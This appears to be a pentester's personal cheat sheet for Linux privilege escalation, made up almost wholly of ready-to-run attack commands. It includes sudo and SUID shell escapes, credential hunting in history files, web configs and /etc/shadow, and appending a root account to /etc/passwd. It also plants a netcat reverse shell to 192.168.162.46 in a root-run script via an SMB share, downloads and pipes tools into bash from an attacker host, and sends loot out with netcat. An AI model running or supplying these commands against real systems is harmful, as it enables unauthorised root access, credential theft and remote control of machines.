=================================== 
id 
whoami 
groups

uname –a
cat /etc/*release  
searchsploit linux kernel ubuntu 16.04 
searchsploit linux kernel 1.2 debian priv esc 
searchsploit linux kernel | grep -v dos | grep ' 3\.' | grep -i 'root\|privilege\|exploit'  
linux-exploit-suggester.sh --uname <uname-a string>

alias ll='ls -lah --color=auto' 
cat /etc/passwd
grep -vE 'nologin|false' /etc/passwd  
ll /etc/passwd /etc/shadow 
  
=================================== 
sudo -l   
find / -perm -u=s -type f 2>/dev/null   
find / -perm -g=s -type f 2>/dev/null   
find / -perm /u=s,g=s -type f 2>/dev/null | sort -r  
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null | sort -r   

https://gtfobins.github.io  
https://github.com/Anon-Exploiter/SUID3NUM/blob/master/suid3num.py 
sudo -u bob /bin/bash 
sudo su 
sudo find . -exec /bin/sh -p \; -quit 
sudo time /bin/sh -p 
sudo vim -c ':!/bin/sh'  
sudo zsh 
sudo git branch --help config    ..small window then: \!/bin/dash 

=================================== 
alias ll='ls -lsaht --color=auto'
cd /home; ll 
cat /home/*/.bashrc 
cat /home/*/.*history 
find /home -name ".*history" 

ll ~/.ssh/* 
ll /home/*/.ssh/*
ll /etc/ssh/ssh_config 
ll /etc/ssh/sshd_config 

ll /root
ll /root/.ssh/*
cat /root/.*history  

ll /etc/
ll /etc/group
grep -iR /etc .secret
ll /opt  
cd /var/mail; ll; cat www-data 
ll /var/spool/mail 
ll /var/lib  
ll /var/logs
ll /usr/bin/pkexec 

ll /tmp 
ll /dev/shm
ll /var/tmp 

ll /var/www/html
ll /var/www/classes
cat /etc/apache2/apache2.conf 
cat /etc/apache2/.htpasswd 
cat /etc/httpd/conf/httpd.conf 
cat /usr/local/etc/apache2/httpd.conf 
grep -i db_ /var/www/wp-config.php 
grep -i db_ /var/www/html/wp-config.php 
grep -R pass /etc/phpmyadmin/  
grep -i pass /etc/phpmyadmin/config-db.php  

ll /weird
ll /backups
ll /export
ll /reports
ll /var/backup
ll /private

find / -type f -user bob 2>/dev/null 
find / -type d -user bob 2>/dev/null  

=================================== 
mount
cat /etc/fstab 
ll /mnt 
cat /etc/sudoers 
lsblk 
lsmod 

env 
ls -lah (interesting paths) 
PATH=/usr/local/bin:/usr/bin:/bin:/usr/games 

=================================== 
Internal Services
ps aux | grep -i root --color=auto     
netstat -antup | grep 127 
nc -nv 127.0.0.1 25  

=================================== 
Other Networks/Connections
ip a 
ifconfig 
ps -ef 
netstat -plantu | grep LIST
iptables -L 
grep -Hs iptables /etc/* 
tail /var/log/auth.log 

=================================== 
grep -i pass * -a3 -b3 
find . -print | grep -i password 
find . -print | grep -i 'user\|account\|config' 
find /home -name .bash_history -exec grep -A 1 '^passwd' {} \; 
find / 2>/dev/null | grep -i config > /var/tmp/config.txt
grep -ri pass /home/* 2>/dev/null 
grep -lri pass ./* --exclude=*.jpg 
grep -ri pass ./* --exclude=*.jpg -A1 -B1 
grep -ri -e pass -e username -e db ./ -A1 -B1 *.txt *.ini 
grep -ri -e password -e username -e db ./ --exclude=*.jpg -A1 -B1 --color=always | more 

=================================== 
crontab -l 
cat /etc/crontab 
ll /etc/cron* 
ll /etc/cron.daily 
grep "CRON" /var/log/cron.log 
find / -user root -writable -type f -not -path "/proc/*"  2>/dev/null 
watch -n 1 'systemctl list-timers' 
systemctl list-timers 
pidof X 
journalctl -f
Tools: Linpeas, Procmon, pspy

=================================== 
Procmon
#!/bin/bash 
IFS=$'\n' 
old_proc=$(ps -eo command) 
while true; do 
  new_process=$(ps -eo command) 
  diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] 
  sleep 1 
  old_process=$new_process 
done 

=================================== 
openssl passwd helps 
openssl passwd -1 -salt aabbcc helps 
echo "mike:J5I78uqmxfVyw:0:0:root:/root:/bin/bash" >> /etc/passwd  
echo "mike:$1$aabbcc$ZgkDQ0ey.wFLZvfnboN311:0:0:mike:/home/mike:/bin/bash" >> /etc/passwd  
su - mike 

=================================== 
Watch for matching dirs 
Found SMB Share with "ITSHOP" 
Matches a log showing root executes "/home/bob/ITSHOP/script" 
echo "nc -nv 192.168.162.46 443 -e /bin/bash &" > script 
smbclient //192.168.200.5/ITDEPT 
put script 

===================================
PwnKit
ll /usr/bin/pkexec 
https://github.com/arthepsy/CVE-2021-4034

===================================
TOOLS
cd /opt/linux_privesc 
sudo python3 -m http.server 80

cd /var/tmp 
wget http://192.168.162.46:80/linpeas.sh                  ..best
wget http://192.168.162.46:80/pspy32                      ..crons
wget http://192.168.162.46:80/suid3num.py                 ..suid check
wget http://192.168.162.46:80/Linuxprivchecker.py         ..prefer 
wget http://192.168.162.46:80/LinEnum.sh                  ..second best 
wget http://192.168.162.46:80/unixprivesc.sh              ..maybe
wget http://192.168.162.46:80/linux-exploit-suggester.sh  ..kernel
wget -r http://192.168.162.46:80/ -P /var/tmp/            ..ALL
curl 192.168.162.46:80/linux-exploit-suggester.sh | bash  ..autorun


===================================
uname -a 
kali> linux-exploit-suggester.sh --uname <uname-a string>

Output
linpeas.sh -a > /var/tmp/linpeas.txt  
less -r /dev/shm/linpeas.txt

Results to Kali
kali> nc -lvnp 9090 > linpeas.txt 
linx> nc 192.168.162.46 9090 < linpeas.txt 

Send to Target
scp pspy bob@192.168.200.5

===================================
Update tools:
cd ~/tools/
git clone https://github.com/mzet-/linux-exploit-suggester 
cp ./linux-exploit-suggester/linux-exploit-suggester.sh ./linux_privesc/ 
